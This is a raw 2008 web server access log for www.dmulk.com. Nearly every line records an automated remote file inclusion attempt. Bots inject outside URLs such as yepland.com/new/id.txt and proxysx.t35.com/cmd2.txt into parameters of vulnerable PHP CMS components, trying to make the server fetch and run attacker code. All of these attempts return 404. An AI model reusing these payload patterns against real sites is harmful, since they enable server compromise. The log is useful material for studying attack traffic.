62.168.15.147 - - [17/Feb/2008:10:39:15 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [17/Feb/2008:10:39:15 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:10:39:22 -0800] "GET /index.php?webcalendarhttp://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:10:39:22 -0800] "GET /logs/index.php?webcalendarhttp://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
64.49.254.23 - - [17/Feb/2008:10:40:18 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.49.254.23 - - [17/Feb/2008:10:40:19 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.49.254.23 - - [17/Feb/2008:10:40:19 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.234.23.53 - - [17/Feb/2008:10:40:32 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.53 - - [17/Feb/2008:10:40:33 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.234.23.53 - - [17/Feb/2008:10:40:33 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.147.20 - - [17/Feb/2008:10:40:35 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.147.20 - - [17/Feb/2008:10:40:36 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.232.147.20 - - [17/Feb/2008:10:40:36 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.141.102.13 - - [17/Feb/2008:10:40:46 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [17/Feb/2008:10:40:46 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.141.102.13 - - [17/Feb/2008:10:40:46 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.40.218 - - [17/Feb/2008:10:40:52 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.40.218 - - [17/Feb/2008:10:40:52 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.65.40.218 - - [17/Feb/2008:10:40:52 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.255.23 - - [17/Feb/2008:10:40:59 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.255.23 - - [17/Feb/2008:10:40:59 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.255.23 - - [17/Feb/2008:10:40:59 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.175.98 - - [17/Feb/2008:10:41:02 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.175.98 - - [17/Feb/2008:10:41:03 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.175.98 - - [17/Feb/2008:10:41:03 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [17/Feb/2008:10:41:03 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [17/Feb/2008:10:41:03 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.36.179.98 - - [17/Feb/2008:10:41:03 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:10:41:33 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:10:41:33 -0800] "GET //skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:10:41:34 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.78.145 - - [17/Feb/2008:10:41:35 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.145 - - [17/Feb/2008:10:41:35 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.78.145 - - [17/Feb/2008:10:41:36 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.234.7.39 - - [17/Feb/2008:10:41:47 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.234.7.39 - - [17/Feb/2008:10:41:47 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.234.7.39 - - [17/Feb/2008:10:41:47 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.86.20 - - [17/Feb/2008:10:42:31 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.86.20 - - [17/Feb/2008:10:42:31 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.86.20 - - [17/Feb/2008:10:42:31 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.105.76 - - [17/Feb/2008:10:42:37 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.105.76 - - [17/Feb/2008:10:42:37 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.105.76 - - [17/Feb/2008:10:42:37 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.33.20.193 - - [17/Feb/2008:10:42:39 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.33.20.193 - - [17/Feb/2008:10:42:40 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.33.20.193 - - [17/Feb/2008:10:42:40 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.201.130 - - [17/Feb/2008:10:42:45 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.58.154.237 - - [17/Feb/2008:10:42:45 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.201.130 - - [17/Feb/2008:10:42:45 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.201.130 - - [17/Feb/2008:10:42:45 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.58.154.237 - - [17/Feb/2008:10:42:45 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
86.58.154.237 - - [17/Feb/2008:10:42:46 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [17/Feb/2008:10:42:59 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [17/Feb/2008:10:42:59 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [17/Feb/2008:10:42:59 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:10:43:26 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:10:43:26 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.87.108 - - [17/Feb/2008:10:43:26 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [17/Feb/2008:10:43:33 -0800] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.7s-softball.com/modules/tinycontent/content/load.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.221.124 - - [17/Feb/2008:10:43:51 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.221.124 - - [17/Feb/2008:10:43:51 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.221.124 - - [17/Feb/2008:10:43:52 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.164.1.13 - - [17/Feb/2008:10:44:32 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
63.164.1.13 - - [17/Feb/2008:10:44:32 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
63.164.1.13 - - [17/Feb/2008:10:44:33 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
87.25.213.172 - - [17/Feb/2008:10:44:34 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:10:44:50 -0800] "GET /index2.php?baseDir=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:10:44:51 -0800] "GET /logs/index2.php?baseDir=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
67.195.58.169 - - [17/Feb/2008:10:45:14 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
91.142.210.13 - - [17/Feb/2008:10:45:35 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [17/Feb/2008:10:45:36 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.210.13 - - [17/Feb/2008:10:45:36 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.164.10 - - [17/Feb/2008:10:46:44 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.177.16.61 - - [17/Feb/2008:10:46:50 -0800] "GET //skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [17/Feb/2008:10:46:52 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [17/Feb/2008:10:46:53 -0800] "GET //skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.16.61 - - [17/Feb/2008:10:46:54 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:10:46:59 -0800] "GET /index2.php?webcalendarhttp://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
80.242.195.25 - - [17/Feb/2008:10:46:59 -0800] "GET /logs/index2.php?webcalendarhttp://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:47:55 -0800] "GET /index2.php?baseDir=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:47:55 -0800] "GET /logs/index2.php?baseDir=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:10:48:42 -0800] "GET /logs/access_080120.log/index.php?sourcedir=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.134.6.30 - - [17/Feb/2008:10:48:54 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:10:48:54 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.134.6.30 - - [17/Feb/2008:10:48:54 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.6.30 - - [17/Feb/2008:10:48:55 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:10:49:07 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:10:49:07 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:10:49:09 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.134.6.30 - - [17/Feb/2008:10:49:10 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.60.64.18 - - [17/Feb/2008:10:49:14 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
202.60.64.18 - - [17/Feb/2008:10:49:14 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:10:49:39 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.133.200.41 - - [17/Feb/2008:10:49:44 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.133.200.41 - - [17/Feb/2008:10:49:44 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.133.200.41 - - [17/Feb/2008:10:49:45 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:10:49:51 -0800] "GET /logs/access_080123.log/index.html.php?abs_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:10:49:51 -0800] "GET /index.html.php?abs_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:10:49:51 -0800] "GET /logs/index.html.php?abs_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.52 - - [17/Feb/2008:10:49:51 -0800] "GET /logs/access_080108.log/index.html.php?abs_path=http://www.onlinebusan.com/user_img/gmaw010021/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:10:49:52 -0800] "GET /logs/access_080108.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:10:49:52 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.144.18 - - [17/Feb/2008:10:49:53 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.177.16.61 - - [17/Feb/2008:10:50:26 -0800] "GET /logs/access_080120.log//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.176 - - [17/Feb/2008:10:50:48 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.68.176 - - [17/Feb/2008:10:50:48 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.192.68.176 - - [17/Feb/2008:10:50:49 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
38.96.148.200 - - [17/Feb/2008:10:50:59 -0800] "GET /logs/index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
38.96.148.200 - - [17/Feb/2008:10:50:59 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://cosmosindoabadi.co.id//test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:10:51:05 -0800] "GET /logs/access_080111.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:10:51:05 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [17/Feb/2008:10:51:05 -0800] "GET /logs/access_071214.log//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:10:51:06 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.168.186 - - [17/Feb/2008:10:51:06 -0800] "GET //include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.241.168.186 - - [17/Feb/2008:10:51:06 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://yepland.com/new/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:10:51:11 -0800] "GET /index3.php?baseDir=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
213.193.222.218 - - [17/Feb/2008:10:51:11 -0800] "GET /logs/index3.php?baseDir=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
83.16.96.219 - - [17/Feb/2008:10:51:43 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.199.52 - - [17/Feb/2008:10:51:44 -0800] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.yildizdogan.org/modules/Forums/admin/Mambo.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
